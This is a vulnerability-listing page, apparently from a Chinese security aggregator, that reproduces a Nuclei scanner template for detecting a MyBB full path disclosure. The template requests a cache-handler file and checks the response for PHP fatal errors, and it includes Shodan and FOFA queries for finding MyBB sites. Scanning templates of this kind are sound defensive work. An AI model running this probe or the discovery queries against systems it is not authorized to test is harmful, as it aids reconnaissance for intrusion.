mybb-full-path-disclosure: MyBB - Full Path Disclosure

日期: 2026-01-16 | 影响软件: MyBB | POC: 已公开

漏洞描述

Detected MyBB forum software exposed the server's full filesystem path through PHP fatal errors when files that implemented interfaces were accessed without dependencies.

PoC代码[已公开]

id: mybb-full-path-disclosure

info:
  name: MyBB - Full Path Disclosure
  author: 0x_Akoko
  severity: low
  description: |
    Detected MyBB forum software exposed the server's full filesystem path through PHP fatal errors when files that implemented interfaces were accessed without dependencies.
  reference:
    - https://mybb.com/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"MyBB"
    fofa-query: body="Powered by MyBB"
  tags: mybb,misconfig,fpd

http:
  - method: GET
    path:
      - "{{BaseURL}}/inc/cachehandlers/disk.php"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Fatal error", "Uncaught Error")'
        condition: and
# digest: 490a0046304402202450f476ee3692bb373803d065d10df409e65ab02665d5ce052de09a33c7f4630220300ea90e027e2f72736cd0f935af3b7a40f2b9c70eda87d38bb704ecff367b54:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/mybb-full-path-disclosure.yaml

相关漏洞推荐